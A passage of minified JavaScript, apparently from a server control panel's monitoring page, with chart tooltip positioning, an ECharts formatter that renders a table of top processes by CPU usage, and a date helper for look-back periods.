_box.left, _y = config.pos[1] + _box.top, _top = 0, _left = 0; if(_x + boxWidth + 80 < winWidth){ _left = config.pos[0] + 20 }else{ _left = config.pos[0] - boxWidth - 20 } if(_y + boxHeight + 80 < winHeight){ _top = config.pos[1] + 20 }else{ _top = config.pos[1] - boxHeight - 20 } if(_y - boxHeight < 0) _top = 0 -_box.top + 10 return [_left, _top] }, // 统计图图例 echarts_formatter: function (config){ var time = config.time, legend = config.legend; var thead = '', tbody = ''; if(typeof config.data === 'undefined') config.data = [] if(typeof config.table === 'undefined'){ config.table = [ {title:'PID', width:'40px', index: 1}, {title: lan.control.process_name, index: 2}, {title: lan.control.cpu_usage, index: 0, unit:'%'}, {title: lan.control.startup_user, index: 4}, ] } for (var i = 0; i < config.data.length; i++) { var item = config.data[i]; if(i === 0) thead += '<tr>' tbody += '<tr>' for (var j = 0; j < config.table.length; j++) { var tableItem = config.table[j] if(i === 0) thead += '<th style="width:'+(tableItem.width || 'auto') +'">'+ tableItem.title +'</th>' var value = '', itemVal = item[tableItem.index] if(typeof tableItem.unit === 'function'){ value = tableItem.unit(itemVal) }else{ value = itemVal + (tableItem.unit || '') } tbody += '<td >'+ value +'</td>' } if(i === 0) thead += '</tr>' tbody += '</tr>' } return '<div class="echarts-tooltip" style="width:'+ (config.width || '450px') +'">\ <div class="formatter-header">\ <img src="" alt="path" />\ <span>' + lan.control.date + ': '+ time +'</span>\ </div>\ <div class="formatter-body">'+ legend + '<div class="process-top5 '+ (config.data.length === 0?'hide':'') +'">\ <div class="process-header"></div>\ <table>\ <thead>\ <tr>'+ thead +'</tr>\ </thead>\ <tbody>'+ tbody +'</tbody>\ </table>\ </div>\ </div>\ </div>' } } } //定义周期时间 function getBeforeDate (n) { var n = n; var d = new Date(); var year = d.getFullYear(); var mon = d.getMonth() + 1; var day = d.getDate(); if (day <= n) { if (mon > 1) { mon = mon - 1; } else { year = year - 1; mon = 12; } } d.setDate(d.getDate() - n); year = d.getFullYear(); mon = d.getMonth() + 1; day = d.getDate(); s = year + "/" + (mon < 10 ? ('0' + mon) : mon) + "/" + (day < 10 ? ('0' + day) : day); return s; }
Close